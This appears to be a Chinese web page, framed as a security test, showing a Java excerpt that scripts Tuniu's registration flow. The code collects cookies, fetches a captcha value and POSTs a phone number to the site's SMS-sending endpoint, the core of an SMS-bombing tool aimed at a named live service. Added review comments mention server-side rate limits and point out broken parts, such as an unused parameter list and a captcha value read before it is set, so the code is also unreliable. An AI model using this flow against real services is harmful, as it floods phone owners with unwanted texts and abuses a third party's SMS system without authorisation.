安全測試 : 途牛旅游網(tuniu.com)網站短信接口安全測試
發布時間:2021-04-28 點擊數:3857
安全問題不容忽視,不要亡羊補牢!
// Excerpt from a method body (the signature and the declarations of inheads, outheads,
// cookieStore, httpclient, input, outMap, phone, imgUrl, smsUrl and retEntity are not shown).
// Visible flow: load the registration page to obtain cookies, obtain an image-captcha value,
// then issue a POST to smsUrl.
// NOTE(review): for the endpoint owner, the controls this flow exercises are server-side ones:
// per-number / per-IP / per-session rate limits on SMS sends and single-use captchas bound to
// the session. Whether the target enforces them cannot be told from this excerpt.

// Configure request headers
inheads.put("Accept", "*/*");
inheads.put("X-Requested-With", "XMLHttpRequest");
inheads.put("Referer", "https://passport.tuniu.com/register?origin=http://www.tuniu.com/ssoConnect");
// Request the registration page; presumably the response cookies are collected into
// outheads / cookieStore (getCookie is defined elsewhere, so confirm against its body).
getCookie(cookieStore, httpclient, "https://passport.tuniu.com/register?origin=http://www.tuniu.com/ssoConnect", inheads, outheads);
// Convert the collected cookies into a single header value; the helper may return null,
// in which case no Cookie header is set.
String cookieStr = GetCookieHead.CookieHashToString(outheads);
if (cookieStr != null) {
inheads.put("Cookie", cookieStr);
}
// Configure request parameters
// NOTE(review): paramsList is not referenced again in the visible lines, and "identify_code"
// is read from input here, before "imgCode" is stored into input further down.
List<BasicNameValuePair> paramsList = new ArrayList<BasicNameValuePair>();
paramsList.add(new BasicNameValuePair("tel", phone));
paramsList.add(new BasicNameValuePair("identify_code", input.get("imgCode")));
paramsList.add(new BasicNameValuePair("intlCode", "0086"));
paramsList.add(new BasicNameValuePair("isReg", "1"));
// Configure and send the request
// getImgeCode presumably fetches the captcha image from imgUrl with a GET and returns its
// text value (helper not shown, so confirm); a null result is replaced with an empty string.
String imgCode = this.getImgeCode(phone, httpclient, cookieStore, "get", imgUrl, inheads, outheads, input, outMap);
input.put("imgCode", imgCode != null ? imgCode : "");
// Submit the POST to smsUrl with the prepared headers and input map; the result is kept
// in retEntity (its type and later use are outside this excerpt).
retEntity = this.userClick(httpclient, cookieStore, "post", smsUrl, inheads, outheads, input, phone);